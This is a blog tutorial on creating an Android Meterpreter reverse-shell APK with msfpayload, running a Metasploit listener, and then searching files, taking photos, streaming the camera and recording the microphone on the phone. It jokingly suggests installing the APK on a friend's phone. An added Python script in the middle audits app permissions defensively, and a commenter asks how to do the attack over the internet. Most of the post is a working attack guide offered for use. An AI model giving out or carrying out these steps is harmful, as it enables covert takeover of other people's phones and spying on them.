Tuesday, February 16, 2016

How to access a Remote Shell on an Android using Metasploit

How to access a Remote Shell on an Android Phone using Metasploit

You will need ...

  • Linux Based System
  • A brain :) 
  • Knowledge of Linux, or maybe not....

To begin, we need to create an APK that incorporates a remote shell. To do so, we will use the msfpayload command from Metasploit.

In Kali Linux (which I will be using), fire up a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > app.apk

The msfpayload command takes one of the meterpreter payloads and lets you create a standalone file or application from it. You will need to put your Kali Linux IP address in for the LHOST address highlighted in bold. You can also change the port if you like.

Once this is executed, a file called “app.apk” will be created on the desktop.

Now just send this file to your Android device, or the device you wanna hack, maybe your friend's phone ;). I used a Samsung Android phone in this case.

Next we have to set Metasploit up to listen for all incoming connections.

In Kali OS, start Metasploit from the menu or by executing “msfconsole” in a terminal window.

Once Metasploit fires up, type the following commands to create a listener:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (enter your Kali IP address)
set LPORT 4444 (your choice between ports 2834 and 4500)

And to start the handler, type exploit

When you run the app on your Android device, or the victim runs it, it will show up as a large “M” icon with “Main Activity” or something of that sort.

A large button will appear on your phone that displays “ReverseTcp”. When it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

In your Metasploit Framework console you should see this:

An active session, as shown, is already created, and it leads you automatically into a meterpreter prompt / command interface.

From there you can type “sysinfo” and device information will be displayed. You can also type “ps” and the running processes will be displayed.

Typing “help” at a meterpreter prompt will list all the commands that are available.

Amazing stuff you can do with your running meterpreter session

Search for a file

meterpreter > search -f *.mp4

Take photos using the device's cameras

First list all the webcams that are available:

meterpreter > webcam_list

You can now run the webcam_snap command. By default it takes a photo using the first camera:

meterpreter > webcam_snap

If you want to take a photo using the second camera:

meterpreter > webcam_snap -i 2

Record sound with the microphone

Run the record_mic command:

meterpreter > record_mic 5

Audio saved to: /root/JxltdUyn.wav

Run the following command to stream from the second camera:

meterpreter > webcam_stream -i 2
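
Each command above only works because the installed APK holds the matching Android permission, which gives a defender something to audit. The following is an added example, not part of the original post or of Metasploit: the inventory records, their field names, the package names and the scoring weights are all constructed assumptions.

```python
"""Audit an app inventory for the capability mix exercised in this post.
INVENTORY is constructed sample data, not output from a real device."""

# Meterpreter feature from the post -> Android permission the app must hold for it.
FEATURE_PERMISSION = {
    "reverse_tcp session": "android.permission.INTERNET",
    "webcam_snap / webcam_stream": "android.permission.CAMERA",
    "record_mic": "android.permission.RECORD_AUDIO",
    "search on shared storage": "android.permission.READ_EXTERNAL_STORAGE",
}
ALL_FOUR = list(FEATURE_PERMISSION.values())

# The post says the app shows up as "Main Activity"; a weak hint, never used alone.
GENERIC_LABELS = {"mainactivity", "main activity"}

INVENTORY = [  # constructed records; the field names are assumptions of this example
    {"package": "com.example.videochat", "label": "VideoChat",
     "sideloaded": False, "permissions": ALL_FOUR},
    {"package": "com.example.unknownapp", "label": "MainActivity",
     "sideloaded": True, "permissions": ALL_FOUR + ["android.permission.READ_SMS"]},
    {"package": "com.example.notes", "label": "Notes",
     "sideloaded": True, "permissions": ["android.permission.INTERNET"]},
]


def audit(app):
    """Return (score, enabled_features) for one inventory record."""
    held = set(app["permissions"])
    features = [name for name, perm in FEATURE_PERMISSION.items() if perm in held]
    score = len(features)
    if app["sideloaded"]:
        score += 2  # installed from a loose APK file, as the post describes
    if app["label"].strip().lower() in GENERIC_LABELS:
        score += 1
    return score, features


def flag_apps(inventory, threshold=6):
    """Packages to review: network access plus sensors/storage, and sideloaded."""
    flagged = []
    for app in inventory:
        score, features = audit(app)
        if "reverse_tcp session" in features and score >= threshold:
            flagged.append((app["package"], score, features))
    return flagged


if __name__ == "__main__":
    for package, score, features in flag_apps(INVENTORY):
        print(f"{package}: score {score} -> {', '.join(features)}")
```

With the default threshold, a store-installed app that holds all four permissions is not flagged; only the sideloaded one is.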

If there is any issue or anything you don't understand, feel free to comment below ... Thanks

2 comments on: "How to access a Remote Shell on an Android using Metasploit"
  1. please help to do this in WAN. plzzzzzzzzzzzzzzzzzzzz

  2. It will be posted here soon, thanks for the suggestion, it's appreciated.